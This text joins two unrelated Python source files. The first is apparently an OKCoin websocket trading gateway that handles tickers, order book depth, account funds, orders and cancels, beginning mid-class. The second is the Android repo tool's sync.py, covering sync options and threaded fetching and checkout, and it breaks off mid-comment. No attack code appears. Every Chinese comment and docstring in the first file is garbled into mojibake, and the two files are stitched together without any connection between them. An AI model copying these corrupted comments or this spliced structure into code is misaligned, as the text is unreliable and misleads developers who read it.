#---------------------------------------------------------------------- def __init__(self, gateway): """Constructor""" super(Api, self).__init__() self.gateway = gateway # gatewayๅฏน่ฑก self.gatewayName = gateway.gatewayName # gatewayๅฏน่ฑกๅ็งฐ self.active = False # ่‹ฅไธบTrueๅˆ™ไผšๅœจๆ–ญ็บฟๅŽ่‡ชๅŠจ้‡่ฟž self.cbDict = {} 
self.tickDict = {} self.orderDict = {} self.localNo = 0 # ๆœฌๅœฐๅง”ๆ‰˜ๅท self.localNoQueue = Queue() # ๆœชๆ”ถๅˆฐ็ณป็ปŸๅง”ๆ‰˜ๅท็š„ๆœฌๅœฐๅง”ๆ‰˜ๅท้˜Ÿๅˆ— self.localNoDict = {} # keyไธบๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒvalueไธบ็ณป็ปŸๅง”ๆ‰˜ๅท self.orderIdDict = {} # keyไธบ็ณป็ปŸๅง”ๆ‰˜ๅท๏ผŒvalueไธบๆœฌๅœฐๅง”ๆ‰˜ๅท self.cancelDict = {} # keyไธบๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒvalueไธบๆ’คๅ•่ฏทๆฑ‚ self.initCallback() #---------------------------------------------------------------------- def onMessage(self, ws, evt): """ไฟกๆฏๆŽจ้€""" data = self.readData(evt)[0] channel = data['channel'] callback = self.cbDict[channel] callback(data) #---------------------------------------------------------------------- def onError(self, ws, evt): """้”™่ฏฏๆŽจ้€""" error = VtErrorData() error.gatewayName = self.gatewayName error.errorMsg = str(evt) self.gateway.onError(error) #---------------------------------------------------------------------- def onClose(self, ws): """ๆŽฅๅฃๆ–ญๅผ€""" # ๅฆ‚ๆžœๅฐšๆœช่ฟžไธŠ๏ผŒๅˆ™ๅฟฝ็•ฅ่ฏฅๆฌกๆ–ญๅผ€ๆ็คบ if not self.gateway.connected: return self.gateway.connected = False self.writeLog(u'ๆœๅŠกๅ™จ่ฟžๆŽฅๆ–ญๅผ€') # ้‡ๆ–ฐ่ฟžๆŽฅ if self.active: def reconnect(): while not self.gateway.connected: self.writeLog(u'็ญ‰ๅพ…10็ง’ๅŽ้‡ๆ–ฐ่ฟžๆŽฅ') sleep(10) if not self.gateway.connected: self.reconnect() t = Thread(target=reconnect) t.start() #---------------------------------------------------------------------- def onOpen(self, ws): """่ฟžๆŽฅๆˆๅŠŸ""" self.gateway.connected = True self.writeLog(u'ๆœๅŠกๅ™จ่ฟžๆŽฅๆˆๅŠŸ') # ่ฟžๆŽฅๅŽๆŸฅ่ฏข่ดฆๆˆทๅ’Œๅง”ๆ‰˜ๆ•ฐๆฎ self.spotUserInfo() self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1') self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1') self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1') # ่ฟžๆŽฅๅŽ่ฎข้˜…็Žฐ่ดง็š„ๆˆไบคๅ’Œ่ดฆๆˆทๆ•ฐๆฎ self.subscribeSpotTrades() self.subscribeSpotUserInfo() self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC) self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC) self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH) self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20) self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20) self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20) # ๅฆ‚ๆžœ่ฟžๆŽฅ็š„ๆ˜ฏUSD็ฝ‘็ซ™ๅˆ™่ฎข้˜…ๆœŸ่ดง็›ธๅ…ณๅ›žๆŠฅๆ•ฐๆฎ if self.currency == vnokcoin.CURRENCY_USD: self.subscribeFutureTrades() self.subscribeFutureUserInfo() self.subscribeFuturePositions() # ่ฟ”ๅ›žๅˆ็บฆไฟกๆฏ if self.currency == vnokcoin.CURRENCY_CNY: l = self.generateCnyContract() else: l = self.generateUsdContract() for contract in l: contract.gatewayName = self.gatewayName self.gateway.onContract(contract) #---------------------------------------------------------------------- def writeLog(self, content): """ๅฟซ้€Ÿ่ฎฐๅฝ•ๆ—ฅๅฟ—""" log = VtLogData() log.gatewayName = self.gatewayName log.logContent = content self.gateway.onLog(log) #---------------------------------------------------------------------- def initCallback(self): """ๅˆๅง‹ๅŒ–ๅ›ž่ฐƒๅ‡ฝๆ•ฐ""" # USD_SPOT self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_eth_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotusd_eth_depth_20'] = self.onDepth self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades 
self.cbDict['ok_spotusd_trade'] = self.onSpotTrade self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder # CNY_SPOT self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_eth_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotcny_eth_depth_20'] = self.onDepth self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades self.cbDict['ok_spotcny_trade'] = self.onSpotTrade self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder # USD_FUTURES #---------------------------------------------------------------------- def onTicker(self, data): """""" if 'data' not in data: return channel = data['channel'] symbol = channelSymbolMap[channel] if symbol not in self.tickDict: tick = VtTickData() tick.symbol = symbol tick.vtSymbol = symbol tick.gatewayName = self.gatewayName self.tickDict[symbol] = tick else: tick = self.tickDict[symbol] rawData = data['data'] tick.highPrice = float(rawData['high']) tick.lowPrice = float(rawData['low']) tick.lastPrice = float(rawData['last']) tick.volume = float(rawData['vol'].replace(',', '')) #tick.date, tick.time = generateDateTime(rawData['timestamp']) newtick = copy(tick) self.gateway.onTick(newtick) #---------------------------------------------------------------------- def onDepth(self, data): """""" if 'data' not in data: return channel = data['channel'] symbol = channelSymbolMap[channel] if symbol not in self.tickDict: tick = VtTickData() tick.symbol = symbol tick.vtSymbol = symbol tick.gatewayName = self.gatewayName self.tickDict[symbol] = tick else: tick = self.tickDict[symbol] if 'data' not in data: return rawData = data['data'] tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0] tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1] tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2] tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3] tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4] tick.askPrice1, tick.askVolume1 = rawData['asks'][-1] tick.askPrice2, tick.askVolume2 = rawData['asks'][-2] tick.askPrice3, tick.askVolume3 = rawData['asks'][-3] tick.askPrice4, tick.askVolume4 = rawData['asks'][-4] tick.askPrice5, tick.askVolume5 = rawData['asks'][-5] tick.date, tick.time = generateDateTime(rawData['timestamp']) newtick = copy(tick) self.gateway.onTick(newtick) #---------------------------------------------------------------------- def onSpotUserInfo(self, data): """็Žฐ่ดง่ดฆๆˆท่ต„้‡‘ๆŽจ้€""" rawData = data['data'] info = rawData['info'] funds = rawData['info']['funds'] # ๆŒไป“ไฟกๆฏ for symbol in ['btc', 'ltc','eth', self.currency]: if symbol in funds['free']: pos = VtPositionData() pos.gatewayName = self.gatewayName pos.symbol = symbol pos.vtSymbol = symbol pos.vtPositionName = symbol pos.direction = DIRECTION_NET pos.frozen = float(funds['freezed'][symbol]) pos.position = pos.frozen + float(funds['free'][symbol]) self.gateway.onPosition(pos) # ่ดฆๆˆท่ต„้‡‘ account = VtAccountData() account.gatewayName = self.gatewayName account.accountID = self.gatewayName account.vtAccountID = account.accountID account.balance = float(funds['asset']['net']) self.gateway.onAccount(account) #---------------------------------------------------------------------- def 
onSpotSubUserInfo(self, data): """็Žฐ่ดง่ดฆๆˆท่ต„้‡‘ๆŽจ้€""" if 'data' not in data: return rawData = data['data'] info = rawData['info'] # ๆŒไป“ไฟกๆฏ for symbol in ['btc', 'ltc','eth', self.currency]: if symbol in info['free']: pos = VtPositionData() pos.gatewayName = self.gatewayName pos.symbol = symbol pos.vtSymbol = symbol pos.vtPositionName = symbol pos.direction = DIRECTION_NET pos.frozen = float(info['freezed'][symbol]) pos.position = pos.frozen + float(info['free'][symbol]) self.gateway.onPosition(pos) #---------------------------------------------------------------------- def onSpotSubTrades(self, data): """ๆˆไบคๅ’Œๅง”ๆ‰˜ๆŽจ้€""" if 'data' not in data: return rawData = data['data'] # ๆœฌๅœฐๅ’Œ็ณป็ปŸๅง”ๆ‰˜ๅท orderId = str(rawData['orderId']) localNo = self.orderIdDict[orderId] # ๅง”ๆ‰˜ไฟกๆฏ if orderId not in self.orderDict: order = VtOrderData() order.gatewayName = self.gatewayName order.symbol = spotSymbolMap[rawData['symbol']] order.vtSymbol = order.symbol order.orderID = localNo order.vtOrderID = '.'.join([self.gatewayName, order.orderID]) order.price = float(rawData['tradeUnitPrice']) order.totalVolume = float(rawData['tradeAmount']) order.direction, priceType = priceTypeMap[rawData['tradeType']] self.orderDict[orderId] = order else: order = self.orderDict[orderId] order.tradedVolume = float(rawData['completedTradeAmount']) order.status = statusMap[rawData['status']] self.gateway.onOrder(copy(order)) # ๆˆไบคไฟกๆฏ if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0: trade = VtTradeData() trade.gatewayName = self.gatewayName trade.symbol = spotSymbolMap[rawData['symbol']] trade.vtSymbol = order.symbol trade.tradeID = str(rawData['id']) trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID]) trade.orderID = localNo trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID]) trade.price = float(rawData['sigTradePrice']) trade.volume = float(rawData['sigTradeAmount']) trade.direction, priceType = priceTypeMap[rawData['tradeType']] trade.tradeTime = datetime.now().strftime('%H:%M:%S') self.gateway.onTrade(trade) #---------------------------------------------------------------------- def onSpotOrderInfo(self, data): """ๅง”ๆ‰˜ไฟกๆฏๆŸฅ่ฏขๅ›ž่ฐƒ""" rawData = data['data'] for d in rawData['orders']: self.localNo += 1 localNo = str(self.localNo) orderId = str(d['order_id']) self.localNoDict[localNo] = orderId self.orderIdDict[orderId] = localNo if orderId not in self.orderDict: order = VtOrderData() order.gatewayName = self.gatewayName order.symbol = spotSymbolMap[d['symbol']] order.vtSymbol = order.symbol order.orderID = localNo order.vtOrderID = '.'.join([self.gatewayName, order.orderID]) order.price = d['price'] order.totalVolume = d['amount'] order.direction, priceType = priceTypeMap[d['type']] self.orderDict[orderId] = order else: order = self.orderDict[orderId] order.tradedVolume = d['deal_amount'] order.status = statusMap[d['status']] self.gateway.onOrder(copy(order)) #---------------------------------------------------------------------- def generateSpecificContract(self, contract, symbol): """็”Ÿๆˆๅˆ็บฆ""" new = copy(contract) new.symbol = symbol new.vtSymbol = symbol new.name = symbol return new #---------------------------------------------------------------------- def generateCnyContract(self): """็”ŸๆˆCNYๅˆ็บฆไฟกๆฏ""" contractList = [] contract = VtContractData() contract.exchange = EXCHANGE_OKCOIN contract.productClass = PRODUCT_SPOT contract.size = 1 contract.priceTick = 0.01 contractList.append(self.generateSpecificContract(contract, 
BTC_CNY_SPOT)) contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT)) contractList.append(self.generateSpecificContract(contract, ETH_CNY_SPOT)) return contractList #---------------------------------------------------------------------- def generateUsdContract(self): """็”ŸๆˆUSDๅˆ็บฆไฟกๆฏ""" contractList = [] # ็Žฐ่ดง contract = VtContractData() contract.exchange = EXCHANGE_OKCOIN contract.productClass = PRODUCT_SPOT contract.size = 1 contract.priceTick = 0.01 contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT)) contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT)) contractList.append(self.generateSpecificContract(contract, ETH_USD_SPOT)) # ๆœŸ่ดง contract.productClass = PRODUCT_FUTURES contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER)) contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER)) contractList.append(self.generateSpecificContract(contract, ETH_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, ETH_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, ETH_USD_QUARTER)) return contractList #---------------------------------------------------------------------- def onSpotTrade(self, data): """ๅง”ๆ‰˜ๅ›žๆŠฅ""" rawData = data['data'] orderId = rawData['order_id'] # ๅฐฝ็ฎกwebsocketๆŽฅๅฃ็š„ๅง”ๆ‰˜ๅท่ฟ”ๅ›žๆ˜ฏๅผ‚ๆญฅ็š„๏ผŒไฝ†็ป่ฟ‡ๆต‹่ฏ•ๆ˜ฏ # ็ฌฆๅˆๅ…ˆๅ‘็Žฐๅ›ž็š„่ง„ๅพ‹๏ผŒๅ› ๆญค่ฟ™้‡Œ้€š่ฟ‡queue่Žทๅ–ไน‹ๅ‰ๅ‘้€็š„ # ๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒๅนถๆŠŠๅฎƒๅ’ŒๆŽจ้€็š„็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ›่กŒๆ˜ ๅฐ„ localNo = self.localNoQueue.get_nowait() self.localNoDict[localNo] = orderId self.orderIdDict[orderId] = localNo # ๆฃ€ๆŸฅๆ˜ฏๅฆๆœ‰็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ”ๅ›žๅ‰ๅฐฑๅ‘ๅ‡บ็š„ๆ’คๅ•่ฏทๆฑ‚๏ผŒ่‹ฅๆœ‰ๅˆ™่ฟ› # ่กŒๆ’คๅ•ๆ“ไฝœ if localNo in self.cancelDict: req = self.cancelDict[localNo] self.spotCancel(req) del self.cancelDict[localNo] #---------------------------------------------------------------------- def onSpotCancelOrder(self, data): """ๆ’คๅ•ๅ›žๆŠฅ""" pass #---------------------------------------------------------------------- def spotSendOrder(self, req): """ๅ‘ๅ•""" symbol = spotSymbolMapReverse[req.symbol][:4] type_ = priceTypeMapReverse[(req.direction, req.priceType)] self.spotTrade(symbol, type_, str(req.price), str(req.volume)) # ๆœฌๅœฐๅง”ๆ‰˜ๅทๅŠ 1๏ผŒๅนถๅฐ†ๅฏนๅบ”ๅญ—็ฌฆไธฒไฟๅญ˜ๅˆฐ้˜Ÿๅˆ—ไธญ๏ผŒ่ฟ”ๅ›žๅŸบไบŽๆœฌๅœฐๅง”ๆ‰˜ๅท็š„vtOrderID self.localNo += 1 self.localNoQueue.put(str(self.localNo)) vtOrderID = '.'.join([self.gatewayName, str(self.localNo)]) return vtOrderID #---------------------------------------------------------------------- def spotCancel(self, req): """ๆ’คๅ•""" symbol = spotSymbolMapReverse[req.symbol][:4] localNo = req.orderID if localNo in self.localNoDict: orderID = self.localNoDict[localNo] self.spotCancelOrder(symbol, orderID) else: # ๅฆ‚ๆžœๅœจ็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ”ๅ›žๅ‰ๅฎขๆˆทๅฐฑๅ‘้€ไบ†ๆ’คๅ•่ฏทๆฑ‚๏ผŒๅˆ™ไฟๅญ˜ # ๅœจcancelDictๅญ—ๅ…ธไธญ๏ผŒ็ญ‰ๅพ…่ฟ”ๅ›žๅŽๆ‰ง่กŒๆ’คๅ•ไปปๅŠก self.cancelDict[localNo] = req #---------------------------------------------------------------------- def generateDateTime(s): """็”Ÿๆˆๆ—ถ้—ด""" dt = datetime.fromtimestamp(float(s)/1e3) time = dt.strftime("%H:%M:%S.%f") date = dt.strftime("%Y%m%d") return 
date, time
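The comments in onSpotTrade and spotCancel above describe the gateway's order-id bookkeeping: local order numbers are queued when an order is sent, paired with the exchange-assigned id when the asynchronous acknowledgement arrives, and cancel requests that race ahead of that acknowledgement are parked until the id is known. The sketch below is a stripped-down Python 3 illustration of that pattern only; the class and method names are hypothetical and are not part of the gateway.

from queue import Queue

class OrderIdMapper(object):
    """Toy model of the local-number / exchange-id pairing used by the gateway."""

    def __init__(self):
        self.localNo = 0
        self.localNoQueue = Queue()   # local numbers still waiting for an exchange id
        self.localNoDict = {}         # local number -> exchange order id
        self.orderIdDict = {}         # exchange order id -> local number
        self.cancelDict = {}          # local numbers with a cancel pending

    def send_order(self):
        # Assign a local number immediately so the caller gets an id before the exchange replies.
        self.localNo += 1
        localNo = str(self.localNo)
        self.localNoQueue.put(localNo)
        return localNo

    def on_order_ack(self, orderId, cancel_func):
        # Acks arrive in send order, so pop the oldest unmatched local number and pair it up.
        localNo = self.localNoQueue.get_nowait()
        self.localNoDict[localNo] = orderId
        self.orderIdDict[orderId] = localNo
        # Flush a cancel that was requested before the exchange id was known.
        if localNo in self.cancelDict:
            cancel_func(orderId)
            del self.cancelDict[localNo]

    def cancel(self, localNo, cancel_func):
        if localNo in self.localNoDict:
            cancel_func(self.localNoDict[localNo])
        else:
            self.cancelDict[localNo] = True  # park it until the ack arrives

mapper = OrderIdMapper()
local = mapper.send_order()
mapper.cancel(local, lambda oid: print('cancel', oid))          # parked: exchange id unknown
mapper.on_order_ack('10001', lambda oid: print('cancel', oid))  # prints: cancel 10001

The pairing only works because the exchange acknowledges orders in the order they were sent, which is the same assumption the gateway's own comment calls out before relying on the queue.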
sync.py
# -*- coding:utf-8 -*- # # Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import json import netrc from optparse import SUPPRESS_HELP import os import re import socket import subprocess import sys import tempfile import time from pyversion import is_python3 if is_python3(): import http.cookiejar as cookielib import urllib.error import urllib.parse import urllib.request import xmlrpc.client else: import cookielib import imp import urllib2 import urlparse import xmlrpclib urllib = imp.new_module('urllib') urllib.error = urllib2 urllib.parse = urlparse urllib.request = urllib2 xmlrpc = imp.new_module('xmlrpc') xmlrpc.client = xmlrpclib try: import threading as _threading except ImportError: import dummy_threading as _threading try: import resource def _rlimit_nofile(): return resource.getrlimit(resource.RLIMIT_NOFILE) except ImportError: def _rlimit_nofile(): return (256, 256) try: import multiprocessing except ImportError: multiprocessing = None import event_log from git_command import GIT, git_require from git_config import GetUrlCookieFile from git_refs import R_HEADS, HEAD import gitc_utils from project import Project from project import RemoteSpec from command import Command, MirrorSafeCommand from error import RepoChangedException, GitError, ManifestParseError import platform_utils from project import SyncBuffer from progress import Progress from wrapper import Wrapper from manifest_xml import GitcManifest _ONE_DAY_S = 24 * 60 * 60 class _FetchError(Exception): """Internal error thrown in _FetchHelper() when we don't want stack trace.""" pass class _CheckoutError(Exception): """Internal error thrown in _CheckoutOne() when we don't want stack trace.""" class Sync(Command, MirrorSafeCommand): jobs = 1 common = True helpSummary = "Update working tree to the latest revision" helpUsage = """ %prog [<project>...] """ helpDescription = """ The '%prog' command synchronizes local project directories with the remote repositories specified in the manifest. If a local project does not yet exist, it will clone a new local directory from the remote repository and set up tracking branches as specified in the manifest. If the local project already exists, '%prog' will update the remote branches and rebase any new local changes on top of the new remote changes. '%prog' will synchronize all projects listed at the command line. Projects can be specified either by name, or by a relative or absolute path to the project's local directory. If no projects are specified, '%prog' will synchronize all projects listed in the manifest. The -d/--detach option can be used to switch specified projects back to the manifest revision. This option is especially helpful if the project is currently on a topic branch, but the manifest revision is temporarily needed. The -s/--smart-sync option can be used to sync to a known good build as specified by the manifest-server element in the current manifest. 
The -t/--smart-tag option is similar and allows you to specify a custom tag/label. The -u/--manifest-server-username and -p/--manifest-server-password options can be used to specify a username and password to authenticate with the manifest server when using the -s or -t option. If -u and -p are not specified when using the -s or -t option, '%prog' will attempt to read authentication credentials for the manifest server from the user's .netrc file. '%prog' will not use authentication credentials from -u/-p or .netrc if the manifest server specified in the manifest file already includes credentials. By default, all projects will be synced. The --fail-fast option can be used to halt syncing as soon as possible when the first project fails to sync. The --force-sync option can be used to overwrite existing git directories if they have previously been linked to a different object directory. WARNING: This may cause data to be lost since refs may be removed when overwriting. The --force-remove-dirty option can be used to remove previously used projects with uncommitted changes. WARNING: This may cause data to be lost since uncommitted changes may be removed with projects that no longer exist in the manifest. The --no-clone-bundle option disables any attempt to use $URL/clone.bundle to bootstrap a new Git repository from a resumable bundle file on a content delivery network. This may be necessary if there are problems with the local Python HTTP client or proxy configuration, but the Git binary works. The --fetch-submodules option enables fetching Git submodules of a project from the server. The -c/--current-branch option can be used to only fetch objects that are on the branch specified by a project's revision. The --optimized-fetch option can be used to only fetch projects that are fixed to a sha1 revision if the sha1 revision does not already exist locally. The --prune option can be used to remove any refs that no longer exist on the remote. # SSH Connections If at least one project remote URL uses an SSH connection (ssh://, git+ssh://, or user@host:path syntax) repo will automatically enable the SSH ControlMaster option when connecting to that host. This feature permits other projects in the same '%prog' session to reuse the same SSH tunnel, saving connection setup overheads. To disable this behavior on UNIX platforms, set the GIT_SSH environment variable to 'ssh'. For example: export GIT_SSH=ssh %prog # Compatibility This feature is automatically disabled on Windows, due to the lack of UNIX domain socket support. This feature is not compatible with url.insteadof rewrites in the user's ~/.gitconfig. '%prog' is currently not able to perform the rewrite early enough to establish the ControlMaster tunnel. If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or later is required to fix a server side protocol bug. """ def _Options(self, p, show_smart=True): try: self.jobs = self.manifest.default.sync_j except ManifestParseError: self.jobs = 1 p.add_option('-f', '--force-broken', dest='force_broken', action='store_true', help='obsolete option (to be deleted in the future)') p.add_option('--fail-fast', dest='fail_fast', action='store_true', help='stop syncing after first error is hit') p.add_option('--force-sync', dest='force_sync', action='store_true', help="overwrite an existing git directory if it needs to " "point to a different object directory. 
WARNING: this " "may cause loss of data") p.add_option('--force-remove-dirty', dest='force_remove_dirty', action='store_true', help="force remove projects with uncommitted modifications if " "projects no longer exist in the manifest. " "WARNING: this may cause loss of data") p.add_option('-l', '--local-only', dest='local_only', action='store_true', help="only update working tree, don't fetch") p.add_option('--no-manifest-update', '--nmu', dest='mp_update', action='store_false', default='true', help='use the existing manifest checkout as-is. ' '(do not update to the latest revision)') p.add_option('-n', '--network-only', dest='network_only', action='store_true', help="fetch only, don't update working tree") p.add_option('-d', '--detach', dest='detach_head', action='store_true', help='detach projects back to manifest revision') p.add_option('-c', '--current-branch', dest='current_branch_only', action='store_true', help='fetch only current branch from server') p.add_option('-v', '--verbose', dest='output_mode', action='store_true', help='show all sync output') p.add_option('-q', '--quiet', dest='output_mode', action='store_false', help='only show errors') p.add_option('-j', '--jobs', dest='jobs', action='store', type='int', help="projects to fetch simultaneously (default %d)" % self.jobs) p.add_option('-m', '--manifest-name', dest='manifest_name', help='temporary manifest to use for this sync', metavar='NAME.xml') p.add_option('--no-clone-bundle', dest='clone_bundle', default=True, action='store_false', help='disable use of /clone.bundle on HTTP/HTTPS') p.add_option('-u', '--manifest-server-username', action='store', dest='manifest_server_username', help='username to authenticate with the manifest server') p.add_option('-p', '--manifest-server-password', action='store', dest='manifest_server_password', help='password to authenticate with the manifest server') p.add_option('--fetch-submodules', dest='fetch_submodules', action='store_true', help='fetch submodules from server') p.add_option('--no-tags', dest='tags', default=True, action='store_false', help="don't fetch tags") p.add_option('--optimized-fetch', dest='optimized_fetch', action='store_true', help='only fetch projects fixed to sha1 if revision does not exist locally') p.add_option('--prune', dest='prune', action='store_true', help='delete refs that no longer exist on the remote') if show_smart: p.add_option('-s', '--smart-sync', dest='smart_sync', action='store_true', help='smart sync using manifest from the latest known good build') p.add_option('-t', '--smart-tag', dest='smart_tag', action='store', help='smart sync using manifest from a known tag') g = p.add_option_group('repo Version options') g.add_option('--no-repo-verify', dest='repo_verify', default=True, action='store_false', help='do not verify repo source code') g.add_option('--repo-upgraded', dest='repo_upgraded', action='store_true', help=SUPPRESS_HELP) def _FetchProjectList(self, opt, projects, sem, *args, **kwargs): """Main function of the fetch threads. Delegates most of the work to _FetchHelper. Args: opt: Program options returned from optparse. See _Options(). projects: Projects to fetch. sem: We'll release() this semaphore when we exit so that another thread can be started up. *args, **kwargs: Remaining arguments to pass to _FetchHelper. See the _FetchHelper docstring for details. 
""" try: for project in projects: success = self._FetchHelper(opt, project, *args, **kwargs) if not success and opt.fail_fast: break finally: sem.release() def _FetchHelper(self, opt, project, lock, fetched, pm, err_event, clone_filter): """Fetch git objects for a single project. Args: opt: Program options returned from optparse. See _Options(). project: Project object for the project to fetch. lock: Lock for accessing objects that are shared amongst multiple _FetchHelper() threads. fetched: set object that we will add project.gitdir to when we're done (with our lock held). pm: Instance of a Project object. We will call pm.update() (with our lock held). err_event: We'll set this event in the case of an error (after printing out info about the error). clone_filter: Filter for use in a partial clone. Returns: Whether the fetch was successful. """ # We'll set to true once we've locked the lock. did_lock = False # Encapsulate everything in a try/except/finally so that: # - We always set err_event in the case of an exception. # - We always make sure we unlock the lock if we locked it. start = time.time() success = False try: try: success = project.Sync_NetworkHalf( quiet=opt.quiet, verbose=opt.verbose, current_branch_only=opt.current_branch_only, force_sync=opt.force_sync, clone_bundle=opt.clone_bundle, tags=opt.tags, archive=self.manifest.IsArchive, optimized_fetch=opt.optimized_fetch, prune=opt.prune, clone_filter=clone_filter) self._fetch_times.Set(project, time.time() - start) # Lock around all the rest of the code, since printing, updating a set # and Progress.update() are not thread safe. lock.acquire() did_lock = True if not success: err_event.set() print('error: Cannot fetch %s from %s' % (project.name, project.remote.url), file=sys.stderr) if opt.fail_fast: raise _FetchError() fetched.add(project.gitdir) pm.update(msg=project.name) except _FetchError: pass except Exception as e: print('error: Cannot fetch %s (%s: %s)' % (project.name, type(e).__name__, str(e)), file=sys.stderr) err_event.set() raise finally: if did_lock: lock.release() finish = time.time() self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK, start, finish, success) return success def _Fetch(self, projects, opt, err_event): fetched = set() lock = _threading.Lock() pm = Progress('Fetching projects', len(projects), always_print_percentage=opt.quiet) objdir_project_map = dict() for project in projects: objdir_project_map.setdefault(project.objdir, []).append(project) threads = set() sem = _threading.Semaphore(self.jobs) for project_list in objdir_project_map.values(): # Check for any errors before running any more tasks. # ...we'll let existing threads finish, though. if err_event.isSet() and opt.fail_fast: break sem.acquire() kwargs = dict(opt=opt, projects=project_list, sem=sem, lock=lock, fetched=fetched, pm=pm, err_event=err_event, clone_filter=self.manifest.CloneFilter) if self.jobs > 1: t = _threading.Thread(target=self._FetchProjectList, kwargs=kwargs) # Ensure that Ctrl-C will not freeze the repo process. t.daemon = True threads.add(t) t.start() else: self._FetchProjectList(**kwargs) for t in threads: t.join() pm.end() self._fetch_times.Save() if not self.manifest.IsArchive: self._GCProjects(projects, opt, err_event) return fetched def _CheckoutWorker(self, opt, sem, project, *args, **kwargs): """Main function of the fetch threads. Delegates most of the work to _CheckoutOne. Args: opt: Program options returned from optparse. See _Options(). projects: Projects to fetch. 
sem: We'll release() this semaphore when we exit so that another thread can be started up. *args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the _CheckoutOne docstring for details. """ try: return self._CheckoutOne(opt, project, *args, **kwargs) finally: sem.release() def _CheckoutOne(self, opt, project, lock, pm, err_event, err_results): """Checkout work tree for one project Args: opt: Program options returned from optparse. See _Options(). project: Project object for the project to checkout. lock: Lock for accessing objects that are shared amongst multiple _CheckoutWorker() threads. pm: Instance of a Project object. We will call pm.update() (with our lock held). err_event: We'll set this event in the case of an error (after printing out info about the error). err_results: A list of strings, paths to git repos where checkout failed. Returns: Whether the fetch was successful. """ # We'll set to true once we've locked the lock. did_lock = False # Encapsulate everything in a try/except/finally so that: # - We always set err_event in the case of an exception. # - We always make sure we unlock the lock if we locked it. start = time.time() syncbuf = SyncBuffer(self.manifest.manifestProject.config, detach_head=opt.detach_head) success = False try: try: project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync) # Lock around all the rest of the code, since printing, updating a set # and Progress.update() are not thread safe. lock.acquire() success = syncbuf.Finish() did_lock = True if not success: err_event.set() print('error: Cannot checkout %s' % (project.name), file=sys.stderr) raise _CheckoutError() pm.update(msg=project.name) except _CheckoutError: pass except Exception as e: print('error: Cannot checkout %s: %s: %s' % (project.name, type(e).__name__, str(e)), file=sys.stderr) err_event.set() raise finally: if did_lock: if not success: err_results.append(project.relpath) lock.release() finish = time.time() self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL, start, finish, success) return success def _Checkout(self, all_projects, opt, err_event, err_results): """Checkout projects listed in all_projects Args: all_projects: List of all projects that should be checked out. opt: Program options returned from optparse. See _Options(). err_event: We'll set this event in the case of an error (after printing out info about the error). err_results: A list of strings, paths to git repos where checkout failed. """ # Perform checkouts in multiple threads when we are using partial clone. # Without partial clone, all needed git objects are already downloaded, # in this 